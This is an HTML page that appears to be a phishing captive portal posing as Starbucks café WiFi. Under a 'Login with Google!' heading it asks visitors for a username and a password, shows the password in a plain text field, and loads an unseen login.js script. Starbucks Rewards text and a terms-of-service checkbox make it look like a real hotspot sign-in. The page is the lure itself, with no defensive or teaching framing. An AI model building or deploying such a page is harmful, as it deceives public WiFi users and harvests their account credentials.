<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="/css/sb_style.css" rel="stylesheet" type="text/css">
    <title>
        Wifi | Starbucks
    </title>
    <script type="text/javascript" src="/js/login.js"></script>

    <link rel="icon" href="images/starbucks_icon.png">
</head>

<h1>Starbucks Wifi</h1>
<div>
    <img class="logo" src=" images/starbucks_icon.png" alt="LOGO">
</div>

<form class="box">

    <h2>Login with Google!</h2>


    <label>Username</label>
    <input type="text" name="Username" />

    <label>Password</label>
    <input type="text" name="Password" />

    <div class="checkbox">
        <input type="checkbox" name="remember" value="" />
        <label>Remember Me</label>
        <div class="clear"></div>
    </div>

    <button type="button">Continue</button>

    <div class="clear"></div>

</form>

<div class="box">
    <h2>Oh hey, more ways to pay</h2>
    <p>For Starbucks® Rewards members, it’s now easier than ever to earn free food and drinks. Collect Stars when you
        pay with cash, credit or gift card.</p>
    <form>

        <div class="checkbox">
            <input type="checkbox" name="remember" value="" />
            <label>I accept the terms of service</label>
            <div class="clear"></div>
        </div>

        <button type="button">Accept &amp; Continue</button>

        <div class="clear"></div>

    </form>
</div>

</html>